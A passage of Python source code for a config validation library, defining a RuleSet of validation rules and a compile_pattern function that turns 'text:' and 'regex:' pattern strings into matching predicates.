            ctx.error('%s', ex)
            return
        ctx.config_set = config_set
        ctx.path = path
        for validator in self.validator_funcs:
            validator(cfg, ctx)

    def __call__(self, func):
        """Registers |func| as an extra validator; lets Rule act as a decorator."""
        assert func
        assert hasattr(func, '__call__')
        self.validator_funcs.append(func)
        func.rule = self
        return func

    def remove(self):
        """Detaches this rule from its rule set, if it belongs to one."""
        owner = self.rule_set
        if owner:
            if self in owner.rules:
                owner.rules.remove(self)
            self.rule_set = None
class RuleSet(object):
    """An ordered collection of Rule objects."""

    def __init__(self):
        self.rules = []

    def add(self, new_rule):
        """Appends |new_rule| and records this set as its owner."""
        assert isinstance(new_rule, Rule)
        new_rule.rule_set = self
        self.rules.append(new_rule)

    def validate(self, config_set, path, content, ctx=None):
        """Runs every matching rule; default ctx raises ValueError on error."""
        ctx = ctx or Context.raise_on_error()
        assert config_set
        assert path
        assert content is not None
        assert isinstance(ctx, Context)
        matching = (r for r in self.rules if r.match(config_set, path))
        for r in matching:
            r.validate(config_set, path, content, ctx)

    def is_defined_for(self, config_set, path):
        """True if at least one rule matches (config_set, path)."""
        return any(r.match(config_set, path) for r in self.rules)

    def patterns(self):
        """Returns a set of all config patterns that this rule_set can validate.

        Returns:
            A set of ConfigPattern objects.
        """
        return {
            ConfigPattern(config_set=r.config_set, path=r.path)
            for r in self.rules
        }
def compile_pattern(pattern):
    """Compiles a pattern string into a predicate function.

    A pattern is a "<kind>:<value>" pair, where kind can be "text" (default)
    or "regex" and value interpretation depends on the kind:
      regex: value must be a regular expression. If it does not start/end
          with ^/$, they are added automatically.
      text: exact string.
    If no colon is present, the pattern is treated as "text:<pattern>".

    Returns:
        func (s: string): bool-ish predicate.

    Raises:
        ValueError if |pattern| is malformed.
    """
    # `basestring` exists only on Python 2; fall back to `str` on Python 3,
    # where the original code raised NameError for any input.
    try:
        string_types = basestring  # noqa: F821
    except NameError:
        string_types = str
    if not isinstance(pattern, string_types):
        raise ValueError('Pattern must be a string')
    if ':' in pattern:
        # Split on the FIRST colon only, so the value may itself contain
        # colons (e.g. "regex:^a:b$"). The original split(':', 2) raised an
        # unpacking ValueError ("too many values") for such patterns.
        kind, value = pattern.split(':', 1)
    else:
        kind = 'text'
        value = pattern
    if kind in ('text', 'exact'):
        return lambda s: s == value
    if kind == 'regex':
        # Anchor the expression at both ends so it must match the whole
        # string, matching the documented behavior.
        if not value.startswith('^'):
            value = '^' + value
        if not value.endswith('$'):
            value = value + '$'
        try:
            regex = re.compile(value)
        except re.error as ex:
            # str(ex) works on both Python 2 and 3; ex.message was py2-only.
            raise ValueError(str(ex))
        return regex.match
    raise ValueError('Invalid pattern kind: %s' % kind)
# Module-level rule set used by rule(), validate() and is_defined_for().
DEFAULT_RULE_SET = RuleSet()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.